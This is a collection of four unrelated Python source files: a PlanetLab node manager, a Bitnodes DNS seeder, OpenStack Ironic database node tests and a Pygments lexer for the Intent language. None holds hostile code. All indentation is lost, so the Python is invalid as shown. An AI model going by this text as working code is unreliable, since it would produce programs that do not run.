parser.add_option('-v', '--verbose', action='store_true', dest='verbose', default=False,
help='more verbose log')
parser.add_option('-P', '--path', action='store', dest='path', default=NodeManager.PLUGIN_PATH,
help='Path to plugins directory')
# NOTE: BUG the 'help' for this parser.add_option() wont list plugins from the --path argument
parser.add_option('-m', '--module', action='store', dest='user_module', default='', help='run a single module')
(self.options, args) = parser.parse_args()
if len(args) != 0:
parser.print_help()
sys.exit(1)
# determine the modules to be run
self.modules = NodeManager.core_modules
# Deal with plugins directory
if os.path.exists(self.options.path):
sys.path.append(self.options.path)
plugins = [ os.path.split(os.path.splitext(x)[0])[1] for x in glob.glob( os.path.join(self.options.path,'*.py') ) ]
self.modules += plugins
if self.options.user_module:
assert self.options.user_module in self.modules
self.modules=[self.options.user_module]
logger.verbose('nodemanager: Running single module %s'%self.options.user_module)
def GetSlivers(self, config, plc):
"""Retrieves GetSlivers at PLC and triggers callbacks defined in modules/plugins"""
try:
logger.log("nodemanager: Syncing w/ PLC")
# retrieve GetSlivers from PLC
data = plc.GetSlivers()
# use the magic 'default' slice to retrieve system-wide defaults
self.getPLCDefaults(data, config)
# tweak the 'vref' attribute from GetSliceFamily
self.setSliversVref (data)
# dump it too, so it can be retrieved later in case of comm. failure
self.dumpSlivers(data)
# log it for debug purposes, no matter what verbose is
logger.log_slivers(data)
logger.verbose("nodemanager: Sync w/ PLC done")
last_data=data
except:
logger.log_exc("nodemanager: failed in GetSlivers")
# XXX So some modules can at least boostrap.
logger.log("nodemanager: Can't contact PLC to GetSlivers(). Continuing.")
data = {}
# for modules that request it though the 'persistent_data' property
last_data=self.loadSlivers()
# Invoke GetSlivers() functions from the callback modules
for module in self.loaded_modules:
logger.verbose('nodemanager: triggering %s.GetSlivers'%module.__name__)
try:
callback = getattr(module, 'GetSlivers')
module_data=data
if getattr(module,'persistent_data',False):
module_data=last_data
callback(data, config, plc)
except:
logger.log_exc("nodemanager: GetSlivers failed to run callback for module %r"%module)
def getPLCDefaults(self, data, config):
"""
Get PLC wide defaults from _default system slice. Adds them to config class.
"""
for slice in data.get('slivers'):
if slice['name'] == config.PLC_SLICE_PREFIX+"_default":
attr_dict = {}
for attr in slice.get('attributes'): attr_dict[attr['tagname']] = attr['value']
if len(attr_dict):
logger.verbose("nodemanager: Found default slice overrides.\n %s" % attr_dict)
config.OVERRIDES = attr_dict
return
# NOTE: if an _default slice existed, it would have been found above and
# the routine would return. Thus, if we've gotten here, then no default
# slice is bound to this node.
if 'OVERRIDES' in dir(config): del config.OVERRIDES
def setSliversVref (self, data):
"""
Tweak the 'vref' attribute in all slivers based on the 'GetSliceFamily' key
"""
# GetSlivers exposes the result of GetSliceFamily() as an separate key in data
# It is safe to override the attributes with this, as this method has the right logic
for sliver in data.get('slivers'):
try:
slicefamily=sliver.get('GetSliceFamily')
for att in sliver['attributes']:
if att['tagname']=='vref':
att['value']=slicefamily
continue
sliver['attributes'].append({ 'tagname':'vref','value':slicefamily})
except:
logger.log_exc("nodemanager: Could not overwrite 'vref' attribute from 'GetSliceFamily'",name=sliver['name'])
def dumpSlivers (self, slivers):
f = open(NodeManager.DB_FILE, "w")
logger.log ("nodemanager: saving successfully fetched GetSlivers in %s" % NodeManager.DB_FILE)
pickle.dump(slivers, f)
f.close()
def loadSlivers (self):
try:
f = open(NodeManager.DB_FILE, "r+")
logger.log("nodemanager: restoring latest known GetSlivers from %s" % NodeManager.DB_FILE)
slivers = pickle.load(f)
f.close()
return slivers
except:
logger.log("Could not restore GetSlivers from %s" % NodeManager.DB_FILE)
return {}
def run(self):
try:
if self.options.daemon: tools.daemon()
# set log level
if (self.options.verbose):
logger.set_level(logger.LOG_VERBOSE)
# Load /etc/planetlab/plc_config
config = Config(self.options.config)
try:
other_pid = tools.pid_file()
if other_pid != None:
print """There might be another instance of the node manager running as pid %d.
If this is not the case, please remove the pid file %s. -- exiting""" % (other_pid, tools.PID_FILE)
return
except OSError, err:
print "Warning while writing PID file:", err
# load modules
self.loaded_modules = []
for module in self.modules:
try:
m = __import__(module)
logger.verbose("nodemanager: triggering %s.start"%m.__name__)
m.start()
self.loaded_modules.append(m)
except ImportError, err:
print "Warning while loading module %s:" % module, err
# sort on priority (lower first)
def sort_module_priority (m1,m2):
return getattr(m1,'priority',NodeManager.default_priority) - getattr(m2,'priority',NodeManager.default_priority)
self.loaded_modules.sort(sort_module_priority)
logger.log('ordered modules:')
for module in self.loaded_modules:
logger.log ('%s: %s'%(getattr(module,'priority',NodeManager.default_priority),module.__name__))
# Load /etc/planetlab/session
if os.path.exists(self.options.session):
session = file(self.options.session).read().strip()
else:
session = None
# get random periods
iperiod=int(self.options.period)
irandom=int(self.options.random)
# Initialize XML-RPC client
plc = PLCAPI(config.plc_api_uri, config.cacert, session, timeout=iperiod/2)
#check auth
logger.log("nodemanager: Checking Auth.")
while plc.check_authentication() != True:
try:
plc.update_session()
logger.log("nodemanager: Authentication Failure. Retrying")
except Exception,e:
logger.log("nodemanager: Retry Failed. (%r); Waiting.."%e)
time.sleep(iperiod)
logger.log("nodemanager: Authentication Succeeded!")
while True:
# Main nodemanager Loop
logger.log('nodemanager: mainloop - calling GetSlivers - period=%d random=%d'%(iperiod,irandom))
self.GetSlivers(config, plc)
delay=iperiod + random.randrange(0,irandom)
logger.log('nodemanager: mainloop - sleeping for %d s'%delay)
time.sleep(delay)
except: logger.log_exc("nodemanager: failed in run")
def run():
logger.log("======================================== Entering nodemanager.py")
NodeManager().run()
if __name__ == '__main__':
run()
else:
# This is for debugging purposes. Open a copy of Python and import nodemanager
tools.as_daemon_thread(run)
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# seeder.py - Exports reachable nodes into DNS zone files for DNS seeder.
#
# Copyright (c) Addy Yeow Chin Heng <ayeowch@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
Exports reachable nodes into DNS zone files for DNS seeder.
"""
import glob
import json
import logging
import operator
import os
import random
import sys
import time
from collections import defaultdict
from ConfigParser import ConfigParser
from utils import new_redis_conn
REDIS_CONN = None
CONF = {}
class Seeder(object):
"""
Implements seeding mechanic by exporting reachable nodes as A and AAAA
records into DNS zone files. A separate DNS server software is expected to
consume and serve the zone files to the public.
"""
def __init__(self):
self.dump = None
self.nodes = []
self.addresses = defaultdict(list)
self.now = 0
def export_nodes(self, dump):
"""
Exports nodes to generate A and AAAA records from the latest snapshot.
"""
self.now = int(time.time())
if dump != self.dump:
try:
self.nodes = json.loads(open(dump, "r").read(),
encoding="latin-1")
except ValueError:
logging.warning("Write pending")
return
if len(self.nodes) == 0:
logging.warning("len(self.nodes): %d", len(self.nodes))
return
self.addresses = defaultdict(list)
for address, services in self.filter_nodes():
self.addresses[services].append(address)
self.dump = dump
self.save_zone_files()
def save_zone_files(self):
"""
Saves A and AAAA records in DNS zone files.
"""
default_zone = os.path.basename(CONF['zone_file'])
for i in range(0xf + 1):
if i == 0:
zone = default_zone
zone_file = CONF['zone_file']
wildcard = "".join([
"\n",
"*.{0}.\tIN\tCNAME\t{0}.".format(default_zone),
])
addresses = []
for services, addrs in self.addresses.iteritems():
if services & 1 == 1: # NODE_NETWORK
addresses.extend(addrs)
else:
zone = 'x%x.%s' % (i, default_zone)
zone_file = CONF['zone_file'].replace(default_zone, zone)
wildcard = ""
addresses = self.addresses[i]
logging.debug("Zone file: %s", zone_file)
serial = str(self.now)
logging.debug("Serial: %s", serial)
template = open(CONF['template'], "r") \
.read() \
.replace("1501826735", serial) \
.replace("seed.bitnodes.io.", zone.replace("zone", ""))
content = "".join([
template,
wildcard,
"\n",
self.get_records(addresses),
]).strip() + "\n"
open(zone_file, "w").write(content)
def get_records(self, addresses):
"""
Returns addresses formatted in A, AAAA, TXT records for a zone file.
"""
a_records = []
aaaa_records = []
txt_records = []
for address in addresses:
if address.endswith(".onion"):
txt_records.append("@\tIN\tTXT\t{}".format(address))
elif ":" in address:
aaaa_records.append("@\tIN\tAAAA\t{}".format(address))
else:
a_records.append("@\tIN\tA\t{}".format(address))
logging.debug("A records: %d", len(a_records))
logging.debug("AAAA records: %d", len(aaaa_records))
logging.debug("TXT records: %d", len(txt_records))
random.shuffle(a_records)
random.shuffle(aaaa_records)
random.shuffle(txt_records)
records = "".join([
"\n".join(a_records[:CONF['a_records']]),
"\n",
"\n".join(aaaa_records[:CONF['aaaa_records']]),
"\n",
"\n".join(txt_records[:CONF['txt_records']]),
])
return records
def filter_nodes(self):
"""
Returns nodes that satisfy the minimum requirements listed below:
1) Height must be at most 2 blocks away from the consensus height
2) Uptime must be equal or greater than the configured min. age
3) Max. one node per ASN
4) Uses default port
"""
consensus_height = self.get_consensus_height()
min_age = self.get_min_age()
asns = set()
for node in self.nodes:
address = node[0]
port = node[1]
age = self.now - node[4]
services = node[5]
height = node[6]
asn = node[13]
if port != CONF['port'] or asn is None or age < min_age:
continue
if consensus_height and abs(consensus_height - height) > 2:
continue
if asn in asns and not address.endswith(".onion"):
continue
yield address, services
asns.add(asn)
def get_consensus_height(self):
"""
Returns the most common height from Redis.
"""
height = REDIS_CONN.get('height')
if height:
height = int(height)
logging.info("Consensus. height: %s", height)
return height
def get_min_age(self):
"""
Returns the minimum required uptime. If the oldest node cannot satisfy
the configured value, use a fallback value of max. 1 percent away from
the uptime of the oldest node.
"""
min_age = CONF['min_age']
oldest = self.now - min(self.nodes, key=operator.itemgetter(4))[4]
logging.info("Longest uptime: %d", oldest)
if oldest < min_age:
min_age = oldest - (0.01 * oldest) # Max. 1% newer than oldest
logging.info("Min. age: %d", min_age)
return min_age
def cron():
"""
Periodically fetches latest snapshot to sample nodes for DNS zone files.
"""
seeder = Seeder()
while True:
time.sleep(5)
try:
dump = max(glob.iglob("{}/*.json".format(CONF['export_dir'])))
except ValueError as err:
logging.warning(err)
continue
logging.info("Dump: %s", dump)
seeder.export_nodes(dump)
def init_conf(argv):
"""
Populates CONF with key-value pairs from configuration file.
"""
conf = ConfigParser()
conf.read(argv[1])
CONF['logfile'] = conf.get('seeder', 'logfile')
CONF['port'] = conf.getint('seeder', 'port')
CONF['db'] = conf.getint('seeder', 'db')
CONF['debug'] = conf.getboolean('seeder', 'debug')
CONF['export_dir'] = conf.get('seeder', 'export_dir')
CONF['min_age'] = conf.getint('seeder', 'min_age')
CONF['zone_file'] = conf.get('seeder', 'zone_file')
CONF['template'] = conf.get('seeder', 'template')
CONF['a_records'] = conf.getint('seeder', 'a_records')
CONF['aaaa_records'] = conf.getint('seeder', 'aaaa_records')
CONF['txt_records'] = conf.getint('seeder', 'txt_records')
zone_dir = os.path.dirname(CONF['zone_file'])
if not os.path.exists(zone_dir):
os.makedirs(zone_dir)
def main(argv):
if len(argv) < 2 or not os.path.exists(argv[1]):
print("Usage: seeder.py [config]")
return 1
# Initialize global conf
init_conf(argv)
# Initialize logger
loglevel = logging.INFO
if CONF['debug']:
loglevel = logging.DEBUG
logformat = ("%(asctime)s,%(msecs)05.1f %(levelname)s (%(funcName)s) "
"%(message)s")
logging.basicConfig(level=loglevel,
format=logformat,
filename=CONF['logfile'],
filemode='w')
print("Log: {}, press CTRL+C to terminate..".format(CONF['logfile']))
global REDIS_CONN
REDIS_CONN = new_redis_conn(db=CONF['db'])
cron()
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
| |
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for manipulating Nodes via the DB API"""
import datetime
import mock
from oslo_utils import timeutils
from oslo_utils import uuidutils
import six
from ironic.common import exception
from ironic.common import states
from ironic.tests.db import base
from ironic.tests.db import utils
class DbNodeTestCase(base.DbTestCase):
def test_create_node(self):
utils.create_test_node()
def test_create_node_already_exists(self):
utils.create_test_node()
self.assertRaises(exception.NodeAlreadyExists,
utils.create_test_node)
def test_create_node_instance_already_associated(self):
instance = uuidutils.generate_uuid()
utils.create_test_node(uuid=uuidutils.generate_uuid(),
instance_uuid=instance)
self.assertRaises(exception.InstanceAssociated,
utils.create_test_node,
uuid=uuidutils.generate_uuid(),
instance_uuid=instance)
def test_create_node_name_duplicate(self):
node = utils.create_test_node(name='spam')
self.assertRaises(exception.DuplicateName,
utils.create_test_node,
name=node.name)
def test_get_node_by_id(self):
node = utils.create_test_node()
res = self.dbapi.get_node_by_id(node.id)
self.assertEqual(node.id, res.id)
self.assertEqual(node.uuid, res.uuid)
def test_get_node_by_uuid(self):
node = utils.create_test_node()
res = self.dbapi.get_node_by_uuid(node.uuid)
self.assertEqual(node.id, res.id)
self.assertEqual(node.uuid, res.uuid)
def test_get_node_by_name(self):
node = utils.create_test_node()
res = self.dbapi.get_node_by_name(node.name)
self.assertEqual(node.id, res.id)
self.assertEqual(node.uuid, res.uuid)
self.assertEqual(node.name, res.name)
def test_get_node_that_does_not_exist(self):
self.assertRaises(exception.NodeNotFound,
self.dbapi.get_node_by_id, 99)
self.assertRaises(exception.NodeNotFound,
self.dbapi.get_node_by_uuid,
'12345678-9999-0000-aaaa-123456789012')
self.assertRaises(exception.NodeNotFound,
self.dbapi.get_node_by_name,
'spam-eggs-bacon-spam')
def test_get_nodeinfo_list_defaults(self):
node_id_list = []
for i in range(1, 6):
node = utils.create_test_node(uuid=uuidutils.generate_uuid())
node_id_list.append(node.id)
res = [i[0] for i in self.dbapi.get_nodeinfo_list()]
self.assertEqual(sorted(res), sorted(node_id_list))
def test_get_nodeinfo_list_with_cols(self):
uuids = {}
extras = {}
for i in range(1, 6):
uuid = uuidutils.generate_uuid()
extra = {'foo': i}
node = utils.create_test_node(extra=extra, uuid=uuid)
uuids[node.id] = uuid
extras[node.id] = extra
res = self.dbapi.get_nodeinfo_list(columns=['id', 'extra', 'uuid'])
self.assertEqual(extras, dict((r[0], r[1]) for r in res))
self.assertEqual(uuids, dict((r[0], r[2]) for r in res))
def test_get_nodeinfo_list_with_filters(self):
node1 = utils.create_test_node(driver='driver-one',
instance_uuid=uuidutils.generate_uuid(),
reservation='fake-host',
uuid=uuidutils.generate_uuid())
node2 = utils.create_test_node(driver='driver-two',
uuid=uuidutils.generate_uuid(),
maintenance=True)
res = self.dbapi.get_nodeinfo_list(filters={'driver': 'driver-one'})
self.assertEqual([node1.id], [r[0] for r in res])
res = self.dbapi.get_nodeinfo_list(filters={'driver': 'bad-driver'})
self.assertEqual([], [r[0] for r in res])
res = self.dbapi.get_nodeinfo_list(filters={'associated': True})
self.assertEqual([node1.id], [r[0] for r in res])
res = self.dbapi.get_nodeinfo_list(filters={'associated': False})
self.assertEqual([node2.id], [r[0] for r in res])
res = self.dbapi.get_nodeinfo_list(filters={'reserved': True})
self.assertEqual([node1.id], [r[0] for r in res])
res = self.dbapi.get_nodeinfo_list(filters={'reserved': False})
self.assertEqual([node2.id], [r[0] for r in res])
res = self.dbapi.get_node_list(filters={'maintenance': True})
self.assertEqual([node2.id], [r.id for r in res])
res = self.dbapi.get_node_list(filters={'maintenance': False})
self.assertEqual([node1.id], [r.id for r in res])
@mock.patch.object(timeutils, 'utcnow', autospec=True)
def test_get_nodeinfo_list_provision(self, mock_utcnow):
past = datetime.datetime(2000, 1, 1, 0, 0)
next = past + datetime.timedelta(minutes=8)
present = past + datetime.timedelta(minutes=10)
mock_utcnow.return_value = past
# node with provision_updated timeout
node1 = utils.create_test_node(uuid=uuidutils.generate_uuid(),
provision_updated_at=past)
# node with None in provision_updated_at
node2 = utils.create_test_node(uuid=uuidutils.generate_uuid(),
provision_state=states.DEPLOYWAIT)
# node without timeout
utils.create_test_node(uuid=uuidutils.generate_uuid(),
provision_updated_at=next)
mock_utcnow.return_value = present
res = self.dbapi.get_nodeinfo_list(filters={'provisioned_before': 300})
self.assertEqual([node1.id], [r[0] for r in res])
res = self.dbapi.get_nodeinfo_list(filters={'provision_state':
states.DEPLOYWAIT})
self.assertEqual([node2.id], [r[0] for r in res])
@mock.patch.object(timeutils, 'utcnow', autospec=True)
def test_get_nodeinfo_list_inspection(self, mock_utcnow):
past = datetime.datetime(2000, 1, 1, 0, 0)
next = past + datetime.timedelta(minutes=8)
present = past + datetime.timedelta(minutes=10)
mock_utcnow.return_value = past
# node with provision_updated timeout
node1 = utils.create_test_node(uuid=uuidutils.generate_uuid(),
inspection_started_at=past)
# node with None in provision_updated_at
node2 = utils.create_test_node(uuid=uuidutils.generate_uuid(),
provision_state=states.INSPECTING)
# node without timeout
utils.create_test_node(uuid=uuidutils.generate_uuid(),
inspection_started_at=next)
mock_utcnow.return_value = present
res = self.dbapi.get_nodeinfo_list(
filters={'inspection_started_before': 300})
self.assertEqual([node1.id], [r[0] for r in res])
res = self.dbapi.get_nodeinfo_list(filters={'provision_state':
states.INSPECTING})
self.assertEqual([node2.id], [r[0] for r in res])
def test_get_node_list(self):
uuids = []
for i in range(1, 6):
node = utils.create_test_node(uuid=uuidutils.generate_uuid())
uuids.append(six.text_type(node['uuid']))
res = self.dbapi.get_node_list()
res_uuids = [r.uuid for r in res]
six.assertCountEqual(self, uuids, res_uuids)
def test_get_node_list_with_filters(self):
ch1 = utils.create_test_chassis(uuid=uuidutils.generate_uuid())
ch2 = utils.create_test_chassis(uuid=uuidutils.generate_uuid())
node1 = utils.create_test_node(driver='driver-one',
instance_uuid=uuidutils.generate_uuid(),
reservation='fake-host',
uuid=uuidutils.generate_uuid(),
chassis_id=ch1['id'])
node2 = utils.create_test_node(driver='driver-two',
uuid=uuidutils.generate_uuid(),
chassis_id=ch2['id'],
maintenance=True)
res = self.dbapi.get_node_list(filters={'chassis_uuid': ch1['uuid']})
self.assertEqual([node1.id], [r.id for r in res])
res = self.dbapi.get_node_list(filters={'chassis_uuid': ch2['uuid']})
self.assertEqual([node2.id], [r.id for r in res])
res = self.dbapi.get_node_list(filters={'driver': 'driver-one'})
self.assertEqual([node1.id], [r.id for r in res])
res = self.dbapi.get_node_list(filters={'driver': 'bad-driver'})
self.assertEqual([], [r.id for r in res])
res = self.dbapi.get_node_list(filters={'associated': True})
self.assertEqual([node1.id], [r.id for r in res])
res = self.dbapi.get_node_list(filters={'associated': False})
self.assertEqual([node2.id], [r.id for r in res])
res = self.dbapi.get_node_list(filters={'reserved': True})
self.assertEqual([node1.id], [r.id for r in res])
res = self.dbapi.get_node_list(filters={'reserved': False})
self.assertEqual([node2.id], [r.id for r in res])
res = self.dbapi.get_node_list(filters={'maintenance': True})
self.assertEqual([node2.id], [r.id for r in res])
res = self.dbapi.get_node_list(filters={'maintenance': False})
self.assertEqual([node1.id], [r.id for r in res])
def test_get_node_list_chassis_not_found(self):
self.assertRaises(exception.ChassisNotFound,
self.dbapi.get_node_list,
{'chassis_uuid': uuidutils.generate_uuid()})
def test_get_node_by_instance(self):
node = utils.create_test_node(
instance_uuid='12345678-9999-0000-aaaa-123456789012')
res = self.dbapi.get_node_by_instance(node.instance_uuid)
self.assertEqual(node.uuid, res.uuid)
def test_get_node_by_instance_wrong_uuid(self):
utils.create_test_node(
instance_uuid='12345678-9999-0000-aaaa-123456789012')
self.assertRaises(exception.InstanceNotFound,
self.dbapi.get_node_by_instance,
'12345678-9999-0000-bbbb-123456789012')
def test_get_node_by_instance_invalid_uuid(self):
self.assertRaises(exception.InvalidUUID,
self.dbapi.get_node_by_instance,
'fake_uuid')
def test_destroy_node(self):
node = utils.create_test_node()
self.dbapi.destroy_node(node.id)
self.assertRaises(exception.NodeNotFound,
self.dbapi.get_node_by_id, node.id)
def test_destroy_node_by_uuid(self):
node = utils.create_test_node()
self.dbapi.destroy_node(node.uuid)
self.assertRaises(exception.NodeNotFound,
self.dbapi.get_node_by_uuid, node.uuid)
def test_destroy_node_that_does_not_exist(self):
self.assertRaises(exception.NodeNotFound,
self.dbapi.destroy_node,
'12345678-9999-0000-aaaa-123456789012')
def test_ports_get_destroyed_after_destroying_a_node(self):
node = utils.create_test_node()
port = utils.create_test_port(node_id=node.id)
self.dbapi.destroy_node(node.id)
self.assertRaises(exception.PortNotFound,
self.dbapi.get_port_by_id, port.id)
def test_ports_get_destroyed_after_destroying_a_node_by_uuid(self):
node = utils.create_test_node()
port = utils.create_test_port(node_id=node.id)
self.dbapi.destroy_node(node.uuid)
self.assertRaises(exception.PortNotFound,
self.dbapi.get_port_by_id, port.id)
def test_update_node(self):
node = utils.create_test_node()
old_extra = node.extra
new_extra = {'foo': 'bar'}
self.assertNotEqual(old_extra, new_extra)
res = self.dbapi.update_node(node.id, {'extra': new_extra})
self.assertEqual(new_extra, res.extra)
def test_update_node_not_found(self):
node_uuid = uuidutils.generate_uuid()
new_extra = {'foo': 'bar'}
self.assertRaises(exception.NodeNotFound, self.dbapi.update_node,
node_uuid, {'extra': new_extra})
def test_update_node_uuid(self):
node = utils.create_test_node()
self.assertRaises(exception.InvalidParameterValue,
self.dbapi.update_node, node.id,
{'uuid': ''})
def test_update_node_associate_and_disassociate(self):
node = utils.create_test_node()
new_i_uuid = uuidutils.generate_uuid()
res = self.dbapi.update_node(node.id, {'instance_uuid': new_i_uuid})
self.assertEqual(new_i_uuid, res.instance_uuid)
res = self.dbapi.update_node(node.id, {'instance_uuid': None})
self.assertIsNone(res.instance_uuid)
def test_update_node_already_associated(self):
node = utils.create_test_node()
new_i_uuid_one = uuidutils.generate_uuid()
self.dbapi.update_node(node.id, {'instance_uuid': new_i_uuid_one})
new_i_uuid_two = uuidutils.generate_uuid()
self.assertRaises(exception.NodeAssociated,
self.dbapi.update_node,
node.id,
{'instance_uuid': new_i_uuid_two})
def test_update_node_instance_already_associated(self):
node1 = utils.create_test_node(uuid=uuidutils.generate_uuid())
new_i_uuid = uuidutils.generate_uuid()
self.dbapi.update_node(node1.id, {'instance_uuid': new_i_uuid})
node2 = utils.create_test_node(uuid=uuidutils.generate_uuid())
self.assertRaises(exception.InstanceAssociated,
self.dbapi.update_node,
node2.id,
{'instance_uuid': new_i_uuid})
@mock.patch.object(timeutils, 'utcnow', autospec=True)
def test_update_node_provision(self, mock_utcnow):
mocked_time = datetime.datetime(2000, 1, 1, 0, 0)
mock_utcnow.return_value = mocked_time
node = utils.create_test_node()
res = self.dbapi.update_node(node.id, {'provision_state': 'fake'})
self.assertEqual(mocked_time,
timeutils.normalize_time(res['provision_updated_at']))
def test_update_node_name_duplicate(self):
node1 = utils.create_test_node(uuid=uuidutils.generate_uuid(),
name='spam')
node2 = utils.create_test_node(uuid=uuidutils.generate_uuid())
self.assertRaises(exception.DuplicateName,
self.dbapi.update_node,
node2.id,
{'name': node1.name})
def test_update_node_no_provision(self):
node = utils.create_test_node()
res = self.dbapi.update_node(node.id, {'extra': {'foo': 'bar'}})
self.assertIsNone(res['provision_updated_at'])
self.assertIsNone(res['inspection_started_at'])
@mock.patch.object(timeutils, 'utcnow', autospec=True)
def test_update_node_inspection_started_at(self, mock_utcnow):
mocked_time = datetime.datetime(2000, 1, 1, 0, 0)
mock_utcnow.return_value = mocked_time
node = utils.create_test_node(uuid=uuidutils.generate_uuid(),
inspection_started_at=mocked_time)
res = self.dbapi.update_node(node.id, {'provision_state': 'fake'})
result = res['inspection_started_at']
self.assertEqual(mocked_time,
timeutils.normalize_time(result))
self.assertIsNone(res['inspection_finished_at'])
@mock.patch.object(timeutils, 'utcnow', autospec=True)
def test_update_node_inspection_finished_at(self, mock_utcnow):
mocked_time = datetime.datetime(2000, 1, 1, 0, 0)
mock_utcnow.return_value = mocked_time
node = utils.create_test_node(uuid=uuidutils.generate_uuid(),
inspection_finished_at=mocked_time)
res = self.dbapi.update_node(node.id, {'provision_state': 'fake'})
result = res['inspection_finished_at']
self.assertEqual(mocked_time,
timeutils.normalize_time(result))
self.assertIsNone(res['inspection_started_at'])
def test_reserve_node(self):
node = utils.create_test_node()
uuid = node.uuid
r1 = 'fake-reservation'
# reserve the node
self.dbapi.reserve_node(r1, uuid)
# check reservation
res = self.dbapi.get_node_by_uuid(uuid)
self.assertEqual(r1, res.reservation)
def test_release_reservation(self):
node = utils.create_test_node()
uuid = node.uuid
r1 = 'fake-reservation'
self.dbapi.reserve_node(r1, uuid)
# release reservation
self.dbapi.release_node(r1, uuid)
res = self.dbapi.get_node_by_uuid(uuid)
self.assertIsNone(res.reservation)
def test_reservation_of_reserved_node_fails(self):
node = utils.create_test_node()
uuid = node.uuid
r1 = 'fake-reservation'
r2 = 'another-reservation'
# reserve the node
self.dbapi.reserve_node(r1, uuid)
# another host fails to reserve or release
self.assertRaises(exception.NodeLocked,
self.dbapi.reserve_node,
r2, uuid)
self.assertRaises(exception.NodeLocked,
self.dbapi.release_node,
r2, uuid)
def test_reservation_after_release(self):
node = utils.create_test_node()
uuid = node.uuid
r1 = 'fake-reservation'
r2 = 'another-reservation'
self.dbapi.reserve_node(r1, uuid)
self.dbapi.release_node(r1, uuid)
# another host succeeds
self.dbapi.reserve_node(r2, uuid)
res = self.dbapi.get_node_by_uuid(uuid)
self.assertEqual(r2, res.reservation)
def test_reservation_in_exception_message(self):
node = utils.create_test_node()
uuid = node.uuid
r = 'fake-reservation'
self.dbapi.reserve_node(r, uuid)
try:
self.dbapi.reserve_node('another', uuid)
except exception.NodeLocked as e:
self.assertIn(r, str(e))
def test_reservation_non_existent_node(self):
node = utils.create_test_node()
self.dbapi.destroy_node(node.id)
self.assertRaises(exception.NodeNotFound,
self.dbapi.reserve_node, 'fake', node.id)
self.assertRaises(exception.NodeNotFound,
self.dbapi.reserve_node, 'fake', node.uuid)
def test_release_non_existent_node(self):
node = utils.create_test_node()
self.dbapi.destroy_node(node.id)
self.assertRaises(exception.NodeNotFound,
self.dbapi.release_node, 'fake', node.id)
self.assertRaises(exception.NodeNotFound,
self.dbapi.release_node, 'fake', node.uuid)
def test_release_non_locked_node(self):
node = utils.create_test_node()
self.assertEqual(None, node.reservation)
self.assertRaises(exception.NodeNotLocked,
self.dbapi.release_node, 'fake', node.id)
self.assertRaises(exception.NodeNotLocked,
self.dbapi.release_node, 'fake', node.uuid)
| |
import re
from pygments.lexer import Lexer
from pygments.token import Token, Comment, Name, String, Number, Punctuation, Error, Keyword, Text
# Although Intent has a context-free grammar, it is much easier to lex with lookaheads
# and state. Pygment's lexers are certainly capable of being stateful, but the input
# to pygments might be a small gist rather than a whole compilation unit, which means
# we might be starting in a state that's difficult to derive without a full-blown
# state machine. Therefore, we're not attempting the same perfection in lexing, here,
# that we'd need if we were feeding a parser. Also, we are not deriving from RegexLexer
# because it's easier and faster to test certain constructions without regex.
class IntentLexer(Lexer):
"""
For `Intent <http://intentlang.org>`_ source code.
"""
name = 'Intent'
aliases = ['intent']
filenames = ['*.i', '*.I']
mimetypes = ['text/x-intent']
# Higher than swig, lower than C/C++
priority = 0.09
# Swig also uses the *.i extension. Therefore we need to do some scanning to
# decide whether a *.i file is likely to be intent code or a swig module. This
# scanning is helpful anyway, in case other languages get added that also
# use *.i.
# These regexes are very typical of swig interfaces.
swig_module_pat = re.compile(r'^\s*%module', re.MULTILINE)
swig_other_directive_pat = re.compile(r'^\s*%[a-z]+', re.MULTILINE)
swig_curlies_pat = re.compile(r'%\{.*?%\}', re.DOTALL)
# These regexes are very typical of intent code.
define_pat = re.compile(r'^\s*[a-zA-Z _]+\s*:', re.MULTILINE)
soft_line_break_pat = re.compile(r'^\s*\.\.\.', re.MULTILINE)
marks_in_assignment_pat = re.compile(':\s+[-+][a-z]+')
def analyse_text(txt):
try:
# Because it's possible for swig templates to contain intent code, we need to
# eliminate the possibility of swig first. The following swig markers should
# virtually never occur in intent code.
if (IntentLexer.swig_module_pat.search(txt) or
IntentLexer.swig_other_directive_pat.search(txt)):
return 0.0
line_count = 1.0 + txt.count('\n')
# A smoking gun for intent code is its unique line wrap strategy. If there
# are any soft line breaks, it's a good indicator. However, these may not
# show up very often...
weight = 7
count = len(IntentLexer.soft_line_break_pat.findall(txt))
probability = min(1.0, weight * (count / line_count))
if probability < 1.0:
# The define pattern that intent uses to declare variables, functions, and
# classes is very common; most code samples show it on at least 10% of all
# lines. If we see it on 10% of the lines, we want to be 50% sure we're
# looking at intent code.
weight = 5
count = len(IntentLexer.define_pat.findall(txt))
ratio = count / line_count
# If we see a really low ratio of this, and our sample size is at all
# significant, be less confident.
if line_count > 2 and ratio < 0.33:
probability /= 2
else:
probability = min(1.0, probability + (weight * (count / line_count)))
if probability < 1.0:
# Marks on definitions in lect code are also fairly distinctive. We'd expect
# these on 5-20% of all lines.
weight = 4
count = len(IntentLexer.marks_in_assignment_pat.findall(txt))
probability = min(1.0, probability + (weight * (count / line_count)))
return probability
except:
import traceback
traceback.print_exc()
